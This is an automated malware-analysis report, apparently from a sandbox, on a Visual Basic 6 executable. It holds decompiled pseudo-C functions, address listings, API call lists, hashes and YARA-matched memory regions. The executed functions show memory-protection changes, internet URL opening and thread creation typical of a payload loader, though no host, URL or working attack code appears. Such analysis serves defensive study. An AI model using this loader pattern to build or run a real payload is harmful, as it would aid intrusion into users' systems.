                            • Opcode ID: d02b5f6bba77f6543a62b120cb475eaf1022d399cb51db4f8e04a2893e0a1d6b
                            • Instruction ID: de1b775b453343b25ad107acad0ef9b9948d6ee486a9cc0e2df9110597505126
                            • Opcode Fuzzy Hash: d02b5f6bba77f6543a62b120cb475eaf1022d399cb51db4f8e04a2893e0a1d6b
                            • Instruction Fuzzy Hash: 5231E771800209ABDB10EFA2C886ADDBBB8EF04748F50447EF515B71E2DB786A45CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E0040E4C4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
                            				intOrPtr _v12;
                            				long long* _v16;
                            				char _v44;
                            				char _v48;
                            				intOrPtr _v56;
                            				char _v64;
                            				intOrPtr _v72;
                            				char _v80;
                            				void* _v116;
                            				signed int _v120;
                            				signed int _v124;
                            				signed int _v136;
                            				intOrPtr* _v140;
                            				signed int _v144;
                            				signed char _v148;
                            				signed long long _v156;
                            				signed long long _v160;
                            				signed int _v164;
                            				signed int* _t60;
                            				char* _t67;
                            				char* _t71;
                            				signed int _t75;
                            				signed char _t76;
                            				signed int _t80;
                            				intOrPtr _t86;
                            				void* _t92;
                            				long long* _t93;
                            				void* _t94;
                            				intOrPtr* _t95;
                            				signed long long _t98;
                            				signed long long _t100;
                            
                            				_t93 = _t92 - 0xc;
                            				_push(0x4012a6);
                            				_push( *[fs:0x0]);
                            				 *[fs:0x0] = _t93;
                            				L004012A0();
                            				_v16 = _t93;
                            				_v12 = 0x401210;
                            				_t60 = _a8;
                            				 *_t60 =  *_t60 & 0x00000000;
                            				_v72 = 0x80020004;
                            				_v80 = 0xa;
                            				_v56 = 0x80020004;
                            				_v64 = 0xa;
                            				_push( &_v80);
                            				_push( &_v64);
                            				_t98 =  *0x401208;
                            				 *_t93 = _t98;
                            				asm("fld1");
                            				 *_t93 = _t98;
                            				asm("fld1");
                            				 *_t93 = _t98;
                            				L0040137E();
                            				L00401384();
                            				asm("fcomp qword [0x401200]");
                            				asm("fnstsw ax");
                            				asm("sahf");
                            				if( *_t60 == 0) {
                            					_v136 = _v136 & 0x00000000;
                            				} else {
                            					_v136 = 1;
                            				}
                            				_v116 =  ~_v136;
                            				_push( &_v80);
                            				_push( &_v64);
                            				_push(2);
                            				L00401432();
                            				_t94 = _t93 + 0xc;
                            				_t67 = _v116;
                            				if(_t67 == 0) {
                            					L16:
                            					asm("wait");
                            					_push(E0040E700);
                            					return _t67;
                            				} else {
                            					if( *0x410010 != 0) {
                            						_v140 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v140 = 0x410010;
                            					}
                            					_t86 =  *((intOrPtr*)( *_v140));
                            					_t71 =  &_v44;
                            					L004013CC();
                            					_v116 = _t71;
                            					_t75 =  *((intOrPtr*)( *_v116 + 0x58))(_v116,  &_v48, _t71,  *((intOrPtr*)(_t86 + 0x31c))( *_v140));
                            					asm("fclex");
                            					_v120 = _t75;
                            					if(_v120 >= 0) {
                            						_v144 = _v144 & 0x00000000;
                            					} else {
                            						_push(0x58);
                            						_push(0x40b288);
                            						_push(_v116);
                            						_push(_v120);
                            						L004013D8();
                            						_v144 = _t75;
                            					}
                            					_push(0);
                            					_push(0);
                            					_push(_v48);
                            					_t76 =  &_v64;
                            					_push(_t76);
                            					L004013BA();
                            					_t95 = _t94 + 0x10;
                            					_push(_t76);
                            					L004013B4();
                            					_v148 = _t76;
                            					asm("fild dword [ebp-0x90]");
                            					_v156 = _t98;
                            					_t100 = _v156 *  *0x4011f8;
                            					asm("fnstsw ax");
                            					if((_t76 & 0x0000000d) != 0) {
                            						goto L1;
                            					} else {
                            						_v160 = _t100;
                            						 *_t95 = _v160;
                            						_t80 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t86);
                            						asm("fclex");
                            						_v124 = _t80;
                            						if(_v124 >= 0) {
                            							_v164 = _v164 & 0x00000000;
                            						} else {
                            							_push(0x84);
                            							_push(0x40af08);
                            							_push(_a4);
                            							_push(_v124);
                            							L004013D8();
                            							_v164 = _t80;
                            						}
                            						_push( &_v48);
                            						_t67 =  &_v44;
                            						_push(_t67);
                            						_push(2);
                            						L004013C6();
                            						L00401450();
                            						goto L16;
                            					}
                            				}
                            				L1:
                            				return __imp____vbaFPException();
                            			}


































                            0x0040e4c7
                            0x0040e4ca
                            0x0040e4d5
                            0x0040e4d6
                            0x0040e4e2
                            0x0040e4ea
                            0x0040e4ed
                            0x0040e4f4
                            0x0040e4f7
                            0x0040e4fa
                            0x0040e501
                            0x0040e508
                            0x0040e50f
                            0x0040e519
                            0x0040e51d
                            0x0040e51e
                            0x0040e526
                            0x0040e529
                            0x0040e52d
                            0x0040e530
                            0x0040e534
                            0x0040e537
                            0x0040e53c
                            0x0040e541
                            0x0040e547
                            0x0040e549
                            0x0040e54a
                            0x0040e558
                            0x0040e54c
                            0x0040e54c
                            0x0040e54c
                            0x0040e567
                            0x0040e56e
                            0x0040e572
                            0x0040e573
                            0x0040e575
                            0x0040e57a
                            0x0040e57d
                            0x0040e583
                            0x0040e6c0
                            0x0040e6c0
                            0x0040e6c1
                            0x00000000
                            0x0040e589
                            0x0040e590
                            0x0040e5ad
                            0x0040e592
                            0x0040e592
                            0x0040e597
                            0x0040e59c
                            0x0040e5a1
                            0x0040e5a1
                            0x0040e5c7
                            0x0040e5d1
                            0x0040e5d5
                            0x0040e5da
                            0x0040e5e9
                            0x0040e5ec
                            0x0040e5ee
                            0x0040e5f5
                            0x0040e611
                            0x0040e5f7
                            0x0040e5f7
                            0x0040e5f9
                            0x0040e5fe
                            0x0040e601
                            0x0040e604
                            0x0040e609
                            0x0040e609
                            0x0040e618
                            0x0040e61a
                            0x0040e61c
                            0x0040e61f
                            0x0040e622
                            0x0040e623
                            0x0040e628
                            0x0040e62b
                            0x0040e62c
                            0x0040e631
                            0x0040e637
                            0x0040e63d
                            0x0040e649
                            0x0040e64f
                            0x0040e653
                            0x00000000
                            0x0040e659
                            0x0040e659
                            0x0040e666
                            0x0040e671
                            0x0040e677
                            0x0040e679
                            0x0040e680
                            0x0040e69f
                            0x0040e682
                            0x0040e682
                            0x0040e687
                            0x0040e68c
                            0x0040e68f
                            0x0040e692
                            0x0040e697
                            0x0040e697
                            0x0040e6a9
                            0x0040e6aa
                            0x0040e6ad
                            0x0040e6ae
                            0x0040e6b0
                            0x0040e6bb
                            0x00000000
                            0x0040e6bb
                            0x0040e653
                            0x004012ac
                            0x004012ac

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E4E2
                            • #677.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E537
                            • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E53C
                            • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040E575
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,004012A6), ref: 0040E59C
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E5D5
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B288,00000058), ref: 0040E604
                            • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E623
                            • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,004012A6), ref: 0040E62C
                            • __vbaHresultCheckObj.MSVBVM60(00000000,00401210,0040AF08,00000084), ref: 0040E692
                            • __vbaFreeObjList.MSVBVM60(00000002,?,00000000), ref: 0040E6B0
                            • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,004012A6), ref: 0040E6BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$CheckHresultList$#677CallChkstkLateNew2
                            • String ID: Hr_
                            • API String ID: 1795533351-1729450619
                            • Opcode ID: a675364f681aba08d5994d5d3538bf9a730bcd7f0a9ea5f9dce61d266f859cd8
                            • Instruction ID: a3fe620a25fdf703107967e8351e002836d27afdf42d4a242f89befe57e1e978
                            • Opcode Fuzzy Hash: a675364f681aba08d5994d5d3538bf9a730bcd7f0a9ea5f9dce61d266f859cd8
                            • Instruction Fuzzy Hash: 94515971900208EFDB20DFA1DC45BEDBBB8BB04704F1089AAF144B72A1DB7959949F59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E0040F0BC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a32) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				void* _v36;
                            				void* _v52;
                            				char _v56;
                            				intOrPtr _v64;
                            				intOrPtr _v72;
                            				intOrPtr* _v76;
                            				signed int _v80;
                            				intOrPtr* _v88;
                            				signed int _v92;
                            				char* _t35;
                            				signed int _t39;
                            				intOrPtr _t58;
                            
                            				_push(0x4012a6);
                            				_push( *[fs:0x0]);
                            				 *[fs:0x0] = _t58;
                            				_push(0x48);
                            				L004012A0();
                            				_v12 = _t58;
                            				_v8 = 0x401278;
                            				L004013E4();
                            				L004013E4();
                            				if( *0x410010 != 0) {
                            					_v88 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v88 = 0x410010;
                            				}
                            				_t35 =  &_v56;
                            				L004013CC();
                            				_v76 = _t35;
                            				_v64 = 1;
                            				_v72 = 2;
                            				L004012A0();
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				_t39 =  *((intOrPtr*)( *_v76 + 0x17c))(_v76, 0x10, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x314))( *_v88));
                            				asm("fclex");
                            				_v80 = _t39;
                            				if(_v80 >= 0) {
                            					_v92 = _v92 & 0x00000000;
                            				} else {
                            					_push(0x17c);
                            					_push(0x40b278);
                            					_push(_v76);
                            					_push(_v80);
                            					L004013D8();
                            					_v92 = _t39;
                            				}
                            				L004013D2();
                            				_push(E0040F1C6);
                            				L00401450();
                            				L00401450();
                            				return _t39;
                            			}

















                            0x0040f0c1
                            0x0040f0cc
                            0x0040f0cd
                            0x0040f0d4
                            0x0040f0d7
                            0x0040f0df
                            0x0040f0e2
                            0x0040f0ef
                            0x0040f0fa
                            0x0040f106
                            0x0040f120
                            0x0040f108
                            0x0040f108
                            0x0040f10d
                            0x0040f112
                            0x0040f117
                            0x0040f117
                            0x0040f13b
                            0x0040f13f
                            0x0040f144
                            0x0040f147
                            0x0040f14e
                            0x0040f158
                            0x0040f162
                            0x0040f163
                            0x0040f164
                            0x0040f165
                            0x0040f16e
                            0x0040f174
                            0x0040f176
                            0x0040f17d
                            0x0040f199
                            0x0040f17f
                            0x0040f17f
                            0x0040f184
                            0x0040f189
                            0x0040f18c
                            0x0040f18f
                            0x0040f194
                            0x0040f194
                            0x0040f1a0
                            0x0040f1a5
                            0x0040f1b8
                            0x0040f1c0
                            0x0040f1c5

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040F0D7
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040F0EF
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040F0FA
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,?,?,004012A6), ref: 0040F112
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F13F
                            • __vbaChkstk.MSVBVM60(?,00000000), ref: 0040F158
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,0000017C), ref: 0040F18F
                            • __vbaFreeObj.MSVBVM60 ref: 0040F1A0
                            • __vbaFreeVar.MSVBVM60(0040F1C6), ref: 0040F1B8
                            • __vbaFreeVar.MSVBVM60(0040F1C6), ref: 0040F1C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$Chkstk$CheckHresultNew2
                            • String ID: Hr_
                            • API String ID: 2096563423-1729450619
                            • Opcode ID: fce847355e08392447acd917fcc520b6789c8f63da30a73cdbe726440020b65d
                            • Instruction ID: 4459665ed66450cc652a95d081c201577945b489fb557169d4ade8a6120015f7
                            • Opcode Fuzzy Hash: fce847355e08392447acd917fcc520b6789c8f63da30a73cdbe726440020b65d
                            • Instruction Fuzzy Hash: 18310770910208EFDB10EFD1D846BDDBBB5AF08708F60447AF401BB6E1C7B969498B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E0040E96F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v28;
                            				signed int _v32;
                            				signed int _v44;
                            				signed int _t26;
                            				void* _t37;
                            				void* _t39;
                            				intOrPtr _t40;
                            
                            				_t40 = _t39 - 0xc;
                            				 *[fs:0x0] = _t40;
                            				L004012A0();
                            				_v16 = _t40;
                            				_v12 = 0x401230;
                            				_v8 = 0;
                            				_t26 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012a6, _t37);
                            				L00401420();
                            				_push(0);
                            				_push(0xffffffff);
                            				_push(1);
                            				_push(0);
                            				_push(0x40b350);
                            				_push(_v28);
                            				L00401366();
                            				L0040145C();
                            				_push(_v28);
                            				_push(0x40b358);
                            				L00401360();
                            				if(_t26 != 0) {
                            					_t26 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
                            					_v32 = _t26;
                            					if(_v32 >= 0) {
                            						_v44 = _v44 & 0x00000000;
                            					} else {
                            						_push(0x718);
                            						_push(0x40af38);
                            						_push(_a4);
                            						_push(_v32);
                            						L004013D8();
                            						_v44 = _t26;
                            					}
                            				}
                            				_push(E0040EA2F);
                            				L00401462();
                            				return _t26;
                            			}













                            0x0040e972
                            0x0040e981
                            0x0040e98b
                            0x0040e993
                            0x0040e996
                            0x0040e99d
                            0x0040e9ac
                            0x0040e9b7
                            0x0040e9bc
                            0x0040e9be
                            0x0040e9c0
                            0x0040e9c2
                            0x0040e9c4
                            0x0040e9c9
                            0x0040e9cc
                            0x0040e9d6
                            0x0040e9db
                            0x0040e9de
                            0x0040e9e3
                            0x0040e9ea
                            0x0040e9f4
                            0x0040e9fa
                            0x0040ea01
                            0x0040ea1d
                            0x0040ea03
                            0x0040ea03
                            0x0040ea08
                            0x0040ea0d
                            0x0040ea10
                            0x0040ea13
                            0x0040ea18
                            0x0040ea18
                            0x0040ea01
                            0x0040ea21
                            0x0040ea29
                            0x0040ea2e

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E98B
                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E9B7
                            • #712.MSVBVM60(?,0040B350,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E9CC
                            • __vbaStrMove.MSVBVM60(?,0040B350,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E9D6
                            • __vbaStrCmp.MSVBVM60(0040B358,?,?,0040B350,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E9E3
                            • __vbaHresultCheckObj.MSVBVM60(00000000,00401230,0040AF38,00000718), ref: 0040EA13
                            • __vbaFreeStr.MSVBVM60(0040EA2F,0040B358,?,?,0040B350,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040EA29
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$#712CheckChkstkCopyFreeHresultMove
                            • String ID: cer
                            • API String ID: 1147057769-324084633
                            • Opcode ID: a004e7d52b2991c61220208d1af90764aef92f3a26d0b76ab572fa64dff60f77
                            • Instruction ID: c68c71fc055d68cc65a22260092f900c576b0503f0b23cfb051c226d3cbd9e5e
                            • Opcode Fuzzy Hash: a004e7d52b2991c61220208d1af90764aef92f3a26d0b76ab572fa64dff60f77
                            • Instruction Fuzzy Hash: 84110D70A40209AFDB00AF95C846F9E7BB4EB08754F60807AB501BA1E1D77C69518F98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E0040F1D9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v44;
                            				intOrPtr _v52;
                            				char _v60;
                            				char _v76;
                            				intOrPtr _v116;
                            				char _v124;
                            				short _v128;
                            				short _t30;
                            				short _t33;
                            				void* _t37;
                            				void* _t39;
                            				intOrPtr _t40;
                            
                            				_t40 = _t39 - 0xc;
                            				 *[fs:0x0] = _t40;
                            				L004012A0();
                            				_v16 = _t40;
                            				_v12 = 0x401288;
                            				_v8 = 0;
                            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4012a6, _t37);
                            				 *_a8 =  *_a8 & 0x00000000;
                            				_v52 = 0x20;
                            				_v60 = 2;
                            				_push( &_v60);
                            				_push(1);
                            				_push( &_v76);
                            				L0040133C();
                            				_v116 = 0x40b3e0;
                            				_v124 = 0x8008;
                            				_push( &_v76);
                            				_t30 =  &_v124;
                            				_push(_t30);
                            				L004013F0();
                            				_v128 = _t30;
                            				_push( &_v76);
                            				_push( &_v60);
                            				_push(2);
                            				L00401432();
                            				_t33 = _v128;
                            				if(_t33 != 0) {
                            					_push(0x42);
                            					L00401336();
                            					_v44 = _t33;
                            				}
                            				_push(E0040F2B0);
                            				return _t33;
                            			}


















                            0x0040f1dc
                            0x0040f1eb
                            0x0040f1f5
                            0x0040f1fd
                            0x0040f200
                            0x0040f207
                            0x0040f216
                            0x0040f21c
                            0x0040f21f
                            0x0040f226
                            0x0040f230
                            0x0040f231
                            0x0040f236
                            0x0040f237
                            0x0040f23c
                            0x0040f243
                            0x0040f24d
                            0x0040f24e
                            0x0040f251
                            0x0040f252
                            0x0040f257
                            0x0040f25e
                            0x0040f262
                            0x0040f263
                            0x0040f265
                            0x0040f26d
                            0x0040f273
                            0x0040f275
                            0x0040f277
                            0x0040f27c
                            0x0040f27c
                            0x0040f27f
                            0x00000000

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040F1F5
                            • #607.MSVBVM60(?,00000001,00000002), ref: 0040F237
                            • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F252
                            • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040F265
                            • #570.MSVBVM60(00000042,?,?,004012A6), ref: 0040F277
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$#570#607ChkstkFreeList
                            • String ID:
                            • API String ID: 1644359802-3916222277
                            • Opcode ID: 40066ce560cc0824d3cd410b0a467dc734d9fc33be953ae32b36c6ac5177f997
                            • Instruction ID: 0d502a697fc477b491744bff9d5df0226b6c14431aadea071f6298cc7c9a1ed4
                            • Opcode Fuzzy Hash: 40066ce560cc0824d3cd410b0a467dc734d9fc33be953ae32b36c6ac5177f997
                            • Instruction Fuzzy Hash: 7311E9B1900208ABDB10DFA5C846BDEBBB8FF04704F50407AF904FB291D77995498B99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2197a0a959eedc1965ae3073725480f4d99decd85920674b99f50173eccd32d
                            • Instruction ID: 07ce583d00ca7d47fced8d9b161d496a5f34731cf6adee0aa72e5949b97f5689
                            • Opcode Fuzzy Hash: d2197a0a959eedc1965ae3073725480f4d99decd85920674b99f50173eccd32d
                            • Instruction Fuzzy Hash: 502144306383D79BCB13BB689894BBA7351EF9A754F55C37CFB86C7283D6A088408241
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01205102,00000040,01201DCE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012054A6
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                            • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                            • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                            • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 1DB66BB0
                            • GetCurrentThread.KERNEL32 ref: 1DB66BED
                            • GetCurrentProcess.KERNEL32 ref: 1DB66C2A
                            • GetCurrentThreadId.KERNEL32 ref: 1DB66C83
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: d5e09408243d008bca1b94010047b565a41397ddd6fbf758b393429bb26f70f3
                            • Instruction ID: 0c2d20c76db1673df0cb2969fdf2ff3842ee55a49d9168f7fe20404557292ff7
                            • Opcode Fuzzy Hash: d5e09408243d008bca1b94010047b565a41397ddd6fbf758b393429bb26f70f3
                            • Instruction Fuzzy Hash: 255147B1D007498FDB00CFA9C548BEEBBF5EF88314F108499E41AA7760D775A944CB66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 1DB66BB0
                            • GetCurrentThread.KERNEL32 ref: 1DB66BED
                            • GetCurrentProcess.KERNEL32 ref: 1DB66C2A
                            • GetCurrentThreadId.KERNEL32 ref: 1DB66C83
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: 3faaedde7d35e7e727edd4fafdb0e13974cbae81fb3553e66d4eb76b28c04346
                            • Instruction ID: d0433b65e3203ca685dbbaa8fba9b04508fd89c9bed0491f6d9a65452780d6d0
                            • Opcode Fuzzy Hash: 3faaedde7d35e7e727edd4fafdb0e13974cbae81fb3553e66d4eb76b28c04346
                            • Instruction Fuzzy Hash: 8B5136B0D006498FDB00CFA9C548BEEBBF5FF48314F208459E41AA7760D775A944CB66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InternetOpenA.WININET(01203313,00000000,00000000,00000000,00000000), ref: 01202D85
                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01202E11
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID:
                            • API String ID: 2038078732-0
                            • Opcode ID: 2cd628b695e431ed278ae8e062b6d7b1d1e9d22810da79c52c1bc2a96514fd14
                            • Instruction ID: b97ce648780ec5a19b50d8bcc25a6f2a464e51a02b3ce8edad29051bff464fc0
                            • Opcode Fuzzy Hash: 2cd628b695e431ed278ae8e062b6d7b1d1e9d22810da79c52c1bc2a96514fd14
                            • Instruction Fuzzy Hash: 2631323029038BEFEF329E14CD49FEE3669AF14740F508529BE0DAA1D5D7719A419B14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 909921d047fef7b072fdc241ecbb0b018e4e32d977aec0390c18d32760d2b361
                            • Instruction ID: ac4d7cd08aca836ac7a79c1fd33baff3d2e1031bd757eaba9efb8a845a74f136
                            • Opcode Fuzzy Hash: 909921d047fef7b072fdc241ecbb0b018e4e32d977aec0390c18d32760d2b361
                            • Instruction Fuzzy Hash: 2F419231C5534ECBDB0A9B3584C97D4BBA1AF02214F5E4399D9654B09FD32648AECBC1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: dfe1a4233f3534fcfb507a5632dbeb1de11b8d9da22fb8d6b6a1a4ac54c4fcaf
                            • Instruction ID: b2f78e6384a88e31e1dc48ce72e5926ef696ec706416635ee06e37244b8ff46e
                            • Opcode Fuzzy Hash: dfe1a4233f3534fcfb507a5632dbeb1de11b8d9da22fb8d6b6a1a4ac54c4fcaf
                            • Instruction Fuzzy Hash: F7419330C6530ECBDF1E9A2584C9794BBA19F42364F5E4399E8215B09ED372889DCFC1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DB652A2
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: CreateWindow
                            • String ID:
                            • API String ID: 716092398-0
                            • Opcode ID: 1a25b64cf97f5953da6ca87b27f33da1801f803eba5319d3d138d56894d4a7f4
                            • Instruction ID: 0844d8e8cb17a32371f6710ce20e34b5fd56b8e5767dfbdfeb6b34c04cad6026
                            • Opcode Fuzzy Hash: 1a25b64cf97f5953da6ca87b27f33da1801f803eba5319d3d138d56894d4a7f4
                            • Instruction Fuzzy Hash: 3651C1B1D103499FDB14CFA9C880ADEBBB5FF48314F24852AE819AB210D775A895CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DB652A2
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: CreateWindow
                            • String ID:
                            • API String ID: 716092398-0
                            • Opcode ID: b19019ffd5ef7bedaee3848c382507e5a36e9b791c3e5cfb2b0f1d12fef8e17d
                            • Instruction ID: b8615c06346edaddb1384052b56c3f362f0c02fcea6901fff20969b545f7aa8d
                            • Opcode Fuzzy Hash: b19019ffd5ef7bedaee3848c382507e5a36e9b791c3e5cfb2b0f1d12fef8e17d
                            • Instruction Fuzzy Hash: DD41B1B1D103499FDB14CFA9C880ADEBBF6FF48314F24852AE819AB210D775A855CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: ba3fe973070bdcbf44bfec2a6df6e9d762ead935963c5f9677365fe08bf0cc45
                            • Instruction ID: 3044ec2332cf5627a5097239064fbae485131fbf9218694f63c5594fe9b535fe
                            • Opcode Fuzzy Hash: ba3fe973070bdcbf44bfec2a6df6e9d762ead935963c5f9677365fe08bf0cc45
                            • Instruction Fuzzy Hash: 4031F83063460ACFEF2B5A28C8597B87AA2EF45324F55475AEA029B1D3D3B588C4CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
